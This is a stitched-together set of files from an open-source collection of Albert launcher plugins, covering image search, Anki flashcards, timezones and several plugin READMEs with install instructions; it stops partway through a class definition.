def copy_image(result: BingImage):
fname_in = result.image.absolute()
if result.type == "png":
fname_out = fname_in
else:
fname_out = f"{result.image.absolute()}.png"
subprocess.check_call(["convert", "-format", "png", fname_in, fname_out])
subprocess.check_call(["xclip", "-selection", "clipboard", "-t", "image/png", fname_out])
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "img "
def synopsis(self):
return "search text"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def get_as_item(self, query, result: BingImage):
"""Return an item.
Will return None if the link to the image is not reachable (e.g., on 404)
"""
try:
img = str(result.image.absolute())
except subprocess.CalledProcessError:
v0.debug(f"Could not fetch item -> {result.url}")
return None
actions = [
ClipAction("Copy url", result.url),
ClipAction("Copy local path to image", img),
UrlAction("Open in browser", result.url),
]
if result.type != "gif":
actions.insert(
0, FuncAction("Copy image", lambda result=result: copy_image(result))
)
item = v0.Item(
id=f"{md_name}_{hash(result)}",
icon=[str(result.thumbnail)],
text=result.url[-20:],
subtext=result.type,
completion=f"{query.trigger}",
actions=actions,
)
return item
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string
if len(query_str) < 2:
keys_monitor.reset()
keys_monitor.report()
if not keys_monitor.triggered():
return
bing_images = list(bing_search_set_download(query=query_str, limit=3))
if not bing_images:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="No images found",
subtext=f"Query: {query_str}",
),
)
return
query.add(self.get_bing_results_as_items(query, bing_images))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_bing_results_as_items(self, query, bing_results: List[BingImage]):
"""Get bing results as Albert items ready to be rendered in the UI."""
# TODO Seems to only run in a single thread?!
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
futures = {
executor.submit(self.get_as_item, query, result): "meanings"
for result in bing_results
}
items = []
for future in concurrent.futures.as_completed(futures):
future_res = future.result()
if future_res is not None:
items.append(future_res)
return items
<file_sep># Awesome Albert Plugins
<a href="https://travis-ci.com/bergercookie/awesome-albert-plugins" alt="Build Status">
<img src="https://travis-ci.com/bergercookie/awesome-albert-plugins.svg?branch=master"></a>
<a href="https://www.codacy.com/manual/bergercookie/awesome-albert-plugins">
<img src="https://api.codacy.com/project/badge/Grade/dbefc49bb5f446488da561c7497bb821"/></a>
<a href=https://github.com/bergercookie/awesome-albert-plugins/blob/master/LICENSE alt="LICENCE">
<img src="https://img.shields.io/github/license/bergercookie/awesome-albert-plugins.svg" /></a>
<a href="https://github.com/psf/black">
<img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg"></a>
## Description
This is a collection of plugins and themes for the
[Albert](https://albertlauncher.github.io/) launcher. It strives to be up to
date with the latest state of the Albert launcher and its Python API. In case of
an older albert version, see the branches of this repo.
## Demos
|  |  |
| :----------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------: |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
## Plugins
Currently the list of plugins includes:
- [Abbreviations](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/anki) - ❗Lookup words stored in a file along with their description
- [Anki](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/anki) - 📇 Generate flashcards for [Anki](https://apps.ankiweb.net/)
- [Bluetooth](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/bluetooth) - 🦷 Manage bluetooth devices
- [Clock](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/clock) - ⏰ Create countdown and stopwatch timers
- [Contacts](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/contacts) - 📕 View your contacts and copy emails/telephones, etc.
- [Colors](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/colors) - 🎨 Color lookup using RGB, hex notation or color name
- [Emoji](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/emoji) - 🎉 Search for and copy emojis to clipboard
- [Errno](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/errno_lookup) - ❗Lookup and get information on Linux error codes
- [Google Translate](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/google_translate) - 🉑 Reimplementation of [this](https://github.com/dshoreman/albert-translate) plugin with persistent storage of previous searches, no need for API key and smart HTTP querying to avoid blocking from Google.
- [Harakiri](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/harakiri) - 📫 Create temporary email addresses at [harakirimail.com](https://harakirimail.com/)
- [IP show](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/ipshow) - 🌐 Display information about your network interfaces and public IPs
- [Image Search](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/image_search) - 📷 Search the web for images, download them and/or copy them to clipboard
- [Jira](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/jira) - 📝 View and edit your [Jira](https://www.atlassian.com/software/jira) tickets from Albert
- [Killproc](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/killproc) - ☠️ Kill processes based on fuzzy-search
- [Meme Generator](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/meme_generator) - 😸 Generate memes and copy them to clipboard
- [Pass TOTP](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pass_totp_cli) - 🔢 Generate 2FA codes with [Pass](https://www.passwordstore.org/) and [totp](https://pypi.org/project/totp/)
- [Pass_rlded](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pass_rlded) - 🔒 UNIX Password Manager interaction with fuzzy-search capabilities
- [Pulse Control](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pulse_control) - 🎤 Enable/disable sources and sinks from Pulse Control
- [Remmina](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/remmina) - 🖥️ Start a [Remmina](https://remmina.org/) VNC/SFTP connection
- [Saxophone](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/saxophone) - 🎷 Play your favorite internet radio stations / streams
- [Scratchpad](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/scratchpad) - 📝 Take quick notes into a single textfile
- [Taskwarrior](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/taskwarrior) - 🪖 Interact with the [Taskwarrior](https://taskwarrior.org/) task manager
- [Template Albert Plugin](https://github.com/bergercookie/awesome-albert-plugins) - 🛠️ Template [cookiecutter](https://github.com/cookiecutter/cookiecutter) for creating new Albert plugins
- [Timezones](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/timezones) - 🌏 Lookup timezone information
- [Tldr Lookup](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/tldr_pages) - Lookup [tldr](https://github.com/tldr-pages/tldr) pages and commands
- [URL Error Lookup](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/url_lookup) - 🔗 Lookup URL error codes
- [Words](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/words) - 🔤 Lookup a word definition, synonyms and antonyms
- [Xkcd](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/xkcd) - 📓 List and fuzzy-search the latest [xkcd](https://fr.wikipedia.org/wiki/Xkcd) comics
- [`DuckDuckGo`-based autocompletion search](https://github.com/bergercookie/awesome-albert-plugins#ddgr-based-plugins) - 🦆 for searching on duckduckgo.com, github.com,
stackoverflow, amazon, and a variety of other websites using [ddgr](https://github.com/jarun/ddgr)
- Suggestions-enabled search using [ddgr](https://github.com/jarun/ddgr) on
a variety of websites. For example:
- DuckDuckGo
- Amazon
- Youtube
- Github
- Ebay
- Imdb
- Urban dictionary: Word/Slang definitions lookup
- Python, OpenCV, Dlib, C++ documentation lookup
- ...
- :warning: To avoid getting blocked, a search request is only sent when the
text ends with a dot `"."`.
- Install `google-chrome` or `chromium-browser` to add an "Open in incognito
mode" option
- See the [`ddgr`-specific section](#ddgr-based-plugins) for more
Plugins have been tested with the Albert python `v0.4` interface. If you're
looking for a version that works with earlier versions of the plugin, see the
`prior-to-v0.4` branch. I'm using Python `3.6.8`.
### Themes
- [Mozhi](https://github.com/Hsins/Albert-Mozhi) - A flat, transparent and dark
theme for Albert.
([DEMO](https://github.com/Hsins/Albert-Mozhi/blob/master/demo/demo.gif))
## Motivation
It's really so easy writing plugins and automating parts of your workflow using
Albert and its python extensions. That's the very reason I started writing them.
## Installation
Requirements:
- Linux (tested on Ubuntu)
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: `v0.4`
Clone this repository under your local Albert python plugins directory. By
default the that is: `~/.local/share/albert/org.albert.extension.python/modules`.
Then go to the Albert settings and enable the plugins that you are interested in
using. Beware that you may need to install some more dependencies depending on
the plugins you use. These dependencies will probably be pointed out either when
you enable, or when you run the plugin for the first time. Refer to the
directory of the corresponding plugin for more details.
### `ddgr`-based plugins
The search plugins that use `ddgr` have not been committed to this repo. You
can generate them offline using the `create_ddgr_plugins.py` script provided.
Make sure you have Python >= 3.6 installed:
```
pip3 install --user --upgrade secrets requests ddgr cookiecutter
./create_ddgr_plugins.py
```
This will generate an Albert plugin for each one of the search engines specified
in `create_ddgr_plugins.py`. Adjust the latter as required if you want to
add more or remove plugins.
```py
generate_plugins_only_for = [
"alternativeto",
"amazon",
"askubuntu",
"aur.archlinux",
...
]
```
### I don't want to setup all the plugins, just a few
Very well, then after cloning this repo, just symlink or copy the plugin of
choice under your local python plugins directory. For example for the `jira`
plugin:
```sh
cp -r plugins/jira ~/.local/share/albert/org.albert.extension.python/modules/jira
```
After that, enable the plugin from the Albert settings.
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
### Ideas List (feel free to implement)
- :construction: Giphy - https://github.com/Giphy/giphy-python-client
- :construction: Devdocs.io/Zeal/Dash search
- :construction: Manage your VPN connections - Frontend to `WireGuard`?
- :construction: Spotify mini player - similar to [this](https://github.com/vdesabou/alfred-spotify-mini-player)
- :construction: Movie search and ratings - be able to sign in to various
services and (e.g., imdb) and submit a rating for a movie
- :construction: An alternative to [Alfred's pkgman](https://github.com/willfarrell/alfred-pkgman-workflow)
- :construction: Vagrant start/stop boxes - see [this](https://github.com/m1keil/alfred-vagrant-workflow)
- :construction: Assembly instructions lookup - use [this](https://github.com/asmjit/asmdb)
<file_sep>"""Create new anki cards fast."""
import json
import re
import traceback
from pathlib import Path
from typing import Any, Callable, Optional, Tuple
import albert as v0
import httpx
from gi.repository import GdkPixbuf, Notify
md_name = "Anki"
md_description = "Anki Interaction - Create new anki cards fast"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/anki"
md_bin_dependencies = ["anki"]
md_lib_dependencies = ["httpx", "fuzzywuzzy"]
notif_title = "Anki Interaction" # Custom metadata
icon_path = str(Path(__file__).parent / "anki")
cache_path = Path(v0.cacheLocation()) / "anki"
config_path = Path(v0.configLocation()) / "anki"
data_path = Path(v0.dataLocation()) / "anki"
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
AVAIL_NOTE_TYPES = {
"basic": "Basic",
"basic-reverse": "Basic (and reversed card)",
"cloze": "Cloze",
}
curr_trigger: str = ""
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname: str, convert_fn: Callable = str, init_val: Any = None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
# if the config path doesn't exist, do create it. This may run before the albert
# initialisation function
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
deck_name = FileBackedVar(varname="deck_name", init_val="scratchpad")
# interact with ankiconnect -------------------------------------------------------------------
def anki_post(action, **params) -> Any:
def request(action, **params):
return {"action": action, "params": params, "version": 6}
req_json = json.dumps(request(action, **params)).encode("utf-8")
response = httpx.post(url="http://localhost:8765", content=req_json).json()
if len(response) != 2:
raise RuntimeError("Response has an unexpected number of fields")
if "error" not in response:
raise RuntimeError("Response is missing required error field")
if "result" not in response:
raise RuntimeError("Response is missing required result field")
if response["error"] is not None:
raise RuntimeError(response["error"])
return response["result"]
# plugin main functions -----------------------------------------------------------------------
def add_anki_note(note_type: str, **kargs):
"""
:param kargs: Parameters passed directly to the "notes" section of the POST request
"""
deck = deck_name.get()
# make sure that the deck is already created, otherwise adding the note will fail
anki_post("createDeck", deck=deck)
if note_type not in AVAIL_NOTE_TYPES.values():
raise RuntimeError(f"Unexpected note type -> {note_type}")
params = {
"action": "addNotes",
"notes": [
{
"deckName": deck,
"modelName": note_type,
"tags": ["albert"],
}
],
}
params["notes"][0].update(kargs)
resp = anki_post(**params)
if resp[0] is None:
notify(f"Unable to add new note, params:\n\n{params}")
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = notif_title,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_as_item(**kargs) -> v0.Item:
if "icon" in kargs:
icon = kargs.pop("icon")
else:
icon = icon_path
return v0.Item(id=notif_title, icon=[icon], **kargs)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# subcommands ---------------------------------------------------------------------------------
class Subcommand:
def __init__(self, *, name, desc):
self.name = name
self.desc = desc
def get_as_albert_item(self, *args, **kargs):
return get_as_item(
text=self.desc, completion=f"{curr_trigger}{self.name} ", *args, **kargs
)
def get_as_albert_items_full(self, query_str: str):
return [self.get_as_albert_item()]
def __str__(self) -> str:
return f"Name: {self.name} | Description: {self.desc}"
class ChangeDeck(Subcommand):
usage_str = "Type the new deck name"
def __init__(self):
super(ChangeDeck, self).__init__(
name="change-deck", desc="Change the default deck to dump new notes to"
)
def get_as_albert_items_full(self, query_str: str):
item = self.get_as_albert_item(
subtext=ChangeDeck.usage_str if not query_str else f"Deck to use: {query_str}",
actions=[
FuncAction(
"Change deck",
lambda new_deck_name=query_str: ChangeDeck.change_to(new_deck_name),
)
],
)
return [item]
@staticmethod
def change_to(new_deck_name: str):
# check that that deck exists already:
avail_decks = anki_post("deckNames")
if new_deck_name not in avail_decks:
notify(
"Given deck doesn't exist. Try again with one of the following"
f" names:\n\n{avail_decks}"
)
return
global deck_name
deck_name.set(new_deck_name)
notify(f"New deck name: {deck_name.get()}")
class AddClozeNote(Subcommand):
usage_str = "USAGE: Add text including notations like {{c1::this one}}"
def __init__(self):
super(AddClozeNote, self).__init__(
name="cloze",
desc="Add a new cloze note. Use {{c1:: ... }}, {{c2:: ... }} and so forth",
)
def get_as_albert_items_full(self, query_str: str):
if self.detect_cloze_note(query_str):
subtext = query_str
else:
subtext = AddClozeNote.usage_str
actions = [
FuncAction(
"Add a new cloze note",
lambda cloze_text=query_str: self.add_cloze_note(cloze_text=cloze_text),
)
]
item = self.get_as_albert_item(subtext=subtext, actions=actions)
return [item]
def detect_cloze_note(self, cloze_text: str):
return re.search("{{.*}}", cloze_text)
def add_cloze_note(self, cloze_text: str):
if not self.detect_cloze_note(cloze_text):
notify(f"Not a valid cloze text: {cloze_text}")
return
add_anki_note(
note_type="Cloze",
fields={"Text": cloze_text, "Extra": ""},
options={"clozeAfterAdding": True},
)
class AddBasicNote(Subcommand):
usage_str = "USAGE: front content | back content"
def __init__(self, with_reverse):
if with_reverse:
self.name = "basic-reverse"
self.note_type = AVAIL_NOTE_TYPES[self.name]
else:
self.name = "basic"
self.note_type = "Basic"
super(AddBasicNote, self).__init__(name=self.name, desc=f"Add a new {self.name} note")
def get_as_albert_items_full(self, query_str: str):
query_parts = AddBasicNote.parse_query_str(query_str)
if query_parts:
front = query_parts[0]
back = query_parts[1]
subtext = f'{front} | {back}'
else:
subtext = AddBasicNote.usage_str
actions = [
FuncAction(
f"Add {self.name} Note",
lambda query_str=query_str: self.add_anki_note(query_str),
)
]
item = self.get_as_albert_item(subtext=subtext, actions=actions)
return [item]
@staticmethod
def parse_query_str(query_str: str) -> Optional[Tuple[str, str]]:
"""Parse the front and back contents. Return None if parsing fails."""
sep = "|"
if sep not in query_str:
return
parts = query_str.split("|")
if len(parts) != 2:
return
return parts # type: ignore
def add_anki_note(self, query_str: str):
parts = AddBasicNote.parse_query_str(query_str)
if parts is None:
notify(msg=AddBasicNote.usage_str)
return
front, back = parts
add_anki_note(note_type=self.note_type, fields={"Front": front, "Back": back})
class SubcommandQuery:
def __init__(self, subcommand: Subcommand, query: str):
"""
Query for a specific subcommand.
:query: Query text - doesn't include the subcommand itself
"""
self.command = subcommand
self.query = query
def __str__(self) -> str:
return f"Command: {self.command}\nQuery Text: {self.query}"
def create_subcommands():
return [
AddBasicNote(with_reverse=False),
AddBasicNote(with_reverse=True),
AddClozeNote(),
ChangeDeck(),
]
subcommands = create_subcommands()
def get_subcommand_for_name(name: str) -> Optional[Subcommand]:
"""Get a subcommand with the indicated name."""
matching = [s for s in subcommands if s.name.lower() == name.lower()]
if matching:
return matching[0]
def get_subcommand_query(query_str: str) -> Optional[SubcommandQuery]:
"""
Determine whether current query is of a subcommand.
If so first returned the corresponding SubcommandQeury object.
"""
if not query_str:
return None
# spilt:
# "subcommand_name rest of query" -> ["subcommand_name", "rest of query""]
query_parts = query_str.strip().split(None, maxsplit=1)
if len(query_parts) < 2:
query_str = ""
else:
query_str = query_parts[1]
subcommand = get_subcommand_for_name(query_parts[0])
if subcommand:
return SubcommandQuery(subcommand=subcommand, query=query_str)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "anki "
def synopsis(self):
return "new card content"
def initialize(self):
pass
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
global curr_trigger
curr_trigger = query.trigger
try:
query_str = query.string
if len(query_str) < 2:
results.extend([s.get_as_albert_item() for s in subcommands])
else:
subcommand_query = get_subcommand_query(query_str)
if subcommand_query:
results.extend(
subcommand_query.command.get_as_albert_items_full(
subcommand_query.query
)
)
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=notif_title,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># words - Albert plugin
## Description
Get definitions, synonyms and antonyms for the given word - uses
<https://synonyms.com> under the hood.
## Demo
|  |  |
## Installation instructions
Makes use of [pydictionary](https://github.com/geekpradd/PyDictionary):
`pip3 install --user --upgrade pydictionary`
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># killproc - Albert plugin
## Description
Kill process(es) from Albert
- Search for a process using fuzzy search
- A few different modes to choose from:
- Terminate/Kill the selected process
- Terminate/Kill processes with a matching name
- Terminate/Kill processes based on the provided glob search. For example
`sle*` will kill all the processes that start with `sle` regardless of the
currently selected process
## Demo

## Installation instructions
The following `import` statements should succeed:
```python
import psutil
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
```
Refer to the parent project for more: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># contacts - Albert plugin
## Description
View and copy information from your contacts using
[Albert](https://albertlauncher.github.io/installing/).
To setup:
- Install [vcfxplr](https://github.com/bergercookie/vcfxplr)
- Download your contacts in the `VCF` format. Your contacts provider should have
an export function, e.g., for Google see
[here](https://support.google.com/contacts/answer/7199294?hl=en-GB&co=GENIE.Platform%3DDesktop)
- Enable the plugin as usual (see [parent
project](https://github.com/bergercookie/awesome-albert-plugins) for more).
- On the first run, on `c<space>` point it to the location of the downloaded vcf
file. On subsequent runs it should be ready to go.

You should be able to fuzzy-search through your contacts based on the contact's
full names and once you've found the contact you're looking for you should be
able to copy one of their emails, telephone numbers or full name.

## Demo

## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep># image_search - Albert plugin
## Description
Lookup images directly from the Albert prompt. Download them locally, or copy
them directly to clipboard so that you can instantly send them to friends on
social media!
Under the hood it uses bing and beautiful soup
## Demo
|  |  |  |

## Installation instructions
On Linux, the following programs must be in your path:
* `xclip`
* `convert` (from imagemagick)
And you also have to install `beautifulsoup` via `pip3` for parsing results from Bing.
Refer to the parent project for more installation instructions if required: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># emoji - Albert plugin
## Description
The `emojis` Albert plugin allows you to quickly lookup and copy various emojis
to your clipboard
Thanks to @hugovk for providing the
[em-keyboard](https://github.com/hugovk/em-keyboard) tool. I'm using that for
the list of emojis as well as their labels.
This plugin supports fuzzy search on both the vanilla emojis of `em-keyboard` as
well as custom emojis in `JSON` format added under `~/.emojis.json`.
## Demo
Without any keyword it shows you your most recently used emojis on top:

On additional key presses it allows for fuzzy search on the labels of each emoji:
|  |  |
| :----------------------------------------------------------------------------------------------------------------: | :----------------------------------------------------------------------------------------------------------------: |
## Installation instructions
### Prerequisites
#### Exec prerequisites
- `xclip`: you must have installed xclip; ensure that xlip path is in PATH environment variable.
##### Python prerequisites
- `em-keyboard`: [link to repository](https://github.com/hugovk/em-keyboard)
- `fuzzywuzzy`
Install all dependencies via `pip3`:
```bash
pip3 install em-keyboard fuzzywuzzy
```
Refer to the parent project for more information: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Timezones lookup."""
import concurrent.futures
# TODO Remove this
import pprint
import time
import traceback
from datetime import datetime
from pathlib import Path
import albert as v0 # type: ignore
import pycountry
import pytz
import requests
import tzlocal
from thefuzz import process
from PIL import Image
md_name = "Timezones"
md_description = "Timezones lookup based on city/country"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/timezones"
md_lib_dependencies = [
"Pillow",
"pycountry",
"thefuzz[speedup]",
"tzlocal==2.1",
"requests",
"pytz",
]
icon_path = str(Path(__file__).parent / "timezones")
cache_path = Path(v0.cacheLocation()) / "timezones"
config_path = Path(v0.configLocation()) / "timezones"
data_path = Path(v0.dataLocation()) / "timezones"
country_logos_path = data_path / "logos"
# country code -> cities
code_to_cities = dict({k: v for k, v in pytz.country_timezones.items()})
codes = list(code_to_cities.keys())
city_to_code = {vi: k for k, v in pytz.country_timezones.items() for vi in v}
cities = list(city_to_code.keys())
country_to_code = {c.name: c.alpha_2 for c in pycountry.countries if c.alpha_2 in codes}
country_to_cities = {
country: code_to_cities[code] for country, code in country_to_code.items()
}
countries = list(country_to_code.keys())
local_tz_str = tzlocal.get_localzone().zone
def get_pretty_city_name(city: str) -> str:
return "".join(city.split("/")[-1].split("_"))
full_name_to_city = {
f"{city_to_code[city]}{country.replace(' ', '')}{get_pretty_city_name(city)}": city
for country in countries
for city in country_to_cities[country]
}
def download_logo_for_code(code: str) -> bytes:
"""
Download the logo of the given code.
.. raises:: KeyError if given code is invalid.
"""
ret = requests.get(f"https://flagcdn.com/64x48/{code.lower()}.png")
if not ret.ok:
print(f"[E] Couldn't download logo for code {code}")
return ret.content
def get_logo_path_for_code_orig(code: str) -> Path:
"""Return the path to the cached country logo"""
return country_logos_path / f"{code}-orig.png"
def get_logo_path_for_code(code: str) -> Path:
"""Return the path to the cached country logo"""
return country_logos_path / f"{code}.png"
def save_logo_for_code(code: str, data: bytes):
fname_orig = get_logo_path_for_code_orig(code)
fname = get_logo_path_for_code(code)
with open(fname_orig, "wb") as f:
f.write(data)
old_img = Image.open(fname_orig)
old_size = old_img.size
new_size = (80, 80)
new_img = Image.new("RGBA", new_size)
new_img.paste((255, 255, 255, 0), (0, 0, *new_size))
new_img.paste(
old_img, ((new_size[0] - old_size[0]) // 2, (new_size[1] - old_size[1]) // 2)
)
new_img.save(fname)
def download_and_save_logo_for_code(code):
save_logo_for_code(code, download_logo_for_code(code))
def download_all_logos():
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_code = {
executor.submit(download_and_save_logo_for_code, code): code for code in codes
}
for future in concurrent.futures.as_completed(future_to_code):
code = future_to_code[future]
try:
future.result()
print(f"Fetched logo for country {code}")
except Exception as exc:
print(f"[W] Fetching logo for {code} generated an exception: {exc}")
# plugin main functions -----------------------------------------------------------------------
def get_uniq_elements(seq):
"""Return only the unique elements off the list - Preserve the order.
.. ref:: https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-whilst-preserving-order
"""
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
# supplementary functions ---------------------------------------------------------------------
def get_as_item(city: str):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
code = city_to_code[city]
icon = str(get_logo_path_for_code(code))
utc_dt = pytz.utc.localize(datetime.utcnow())
dst_tz = pytz.timezone(city)
dst_dt = utc_dt.astimezone(dst_tz)
text = f'{dst_dt.strftime("%Y-%m-%d %H:%M %z (%Z)")}'
subtext = f"[{code}] | {city}"
return v0.Item(
id=f"{md_name}_{code}",
icon=[icon],
text=text,
subtext=subtext,
completion=city,
actions=[
UrlAction(
"Open in zeitverschiebung.net",
(
f'https://www.zeitverschiebung.net/en/timezone/{city.replace("/", "--").lower()}'
),
),
],
)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
